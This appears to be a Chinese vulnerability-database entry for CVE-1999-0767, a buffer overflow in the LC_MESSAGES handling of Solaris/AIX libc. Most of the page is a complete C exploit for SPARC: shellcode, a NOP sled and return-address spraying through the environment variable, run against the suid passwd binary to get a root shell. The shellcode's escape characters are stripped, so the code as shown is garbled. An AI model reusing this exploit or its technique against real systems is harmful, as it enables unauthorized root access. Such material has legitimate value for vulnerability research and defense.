Solaris libc,ufsrestore及rcp缓冲区溢出漏洞

Solaris libc,ufsrestore及rcp缓冲区溢出漏洞

漏洞ID 1105456 漏洞类型 缓冲区溢出
发布时间 1999-05-22 更新时间 2005-10-20
图片[1]-Solaris libc,ufsrestore及rcp缓冲区溢出漏洞-安全小百科CVE编号 CVE-1999-0767
图片[2]-Solaris libc,ufsrestore及rcp缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-199909-015
漏洞平台 AIX CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19217
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199909-015
|漏洞详情
Solarislibc,ufsrestore和rcp存在缓冲区溢出漏洞。可以通过LC_MESSAGES环境变量导致该漏洞。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/268/info
    
A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.
*/

/*============================================================
   ex_lobc.c Overflow Exploits( for Sparc Edition)
   The Shadow Penguin Security
   (http://base.oc.to:/skyscraper/byte/551)
   Written by UNYUN ([email protected])
  ============================================================
*/
#define EV          "LC_MESSAGES="
#define ADJUST      0
#define OFFSET      5392
#define STARTADR    400
#define NOP         0xa61cc013
#define RETS        600

char    x[80000];

char exploit_code[] =
"x2dx0bxd8x9axacx15xa1x6e"
"x2bx0bxdaxdcxaex15x63x68"
"x90x0bx80x0ex92x03xa0x0c"
"x94x10x20x10x94x22xa0x10"
"x9cx03xa0x14"
"xecx3bxbfxecxc0x23xbfxf4xdcx23xbfxf8xc0x23xbfxfc"
"x82x10x20x3bx91xd0x20x08x90x1bxc0x0fx82x10x20x01"
"x91xd0x20x08"
;

unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 n");
}

int i;
unsigned int ret_adr;

main()
{
    putenv("LANG=");
    memset(x,'x',70000);

    for (i = 0; i < ADJUST; i++) x[i]=0x40;
    for (i = ADJUST; i < 1000; i+=4){
        x[i+3]=NOP & 0xff;
        x[i+2]=(NOP >> 8 ) &0xff;
        x[i+1]=(NOP >> 16 ) &0xff;
        x[i+0]=(NOP >> 24 ) &0xff;
    }
    for (i=0;i<strlen(exploit_code);i++) x[STARTADR+i+ADJUST]=exploit_code[i];
    ret_adr=get_sp()-OFFSET;
    printf("jumping address : %lxn",ret_adr);
    if ((ret_adr & 0xff) ==0 ){   
        ret_adr -=16;
        printf("New jumping address : %lxn",ret_adr);
    }
    for (i = ADJUST+RETS; i < RETS+600; i+=4){
        x[i+3]=ret_adr & 0xff;
        x[i+2]=(ret_adr >> 8 ) &0xff;
        x[i+1]=(ret_adr >> 16 ) &0xff;
        x[i+0]=(ret_adr >> 24 ) &0xff;
    }
    memcpy(x,EV,strlen(EV));
    x[3000]=0;
    putenv(x);
    execl("/bin/passwd","passwd",(char *)0);
}
|参考资料
VulnerablesoftwareandversionsConfiguration1OR*cpe:/o:sun:solaris:2.6*cpe:/o:sun:solaris:2.6::x86*cpe:/o:sun:solaris:7.0*cpe:/o:sun:solaris:7.0::x86*DenotesVulnerableSoftware*ChangesrelatedtovulnerabilityconfigurationsTechnicalDetailsVulnerabilityType(ViewAll)CVEStandardVulnerabilityEntry:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0767

相关推荐: Savant Web Server Page Redirect Denial Of Service Vulnerability

Savant Web Server Page Redirect Denial Of Service Vulnerability 漏洞ID 1099521 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 20…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享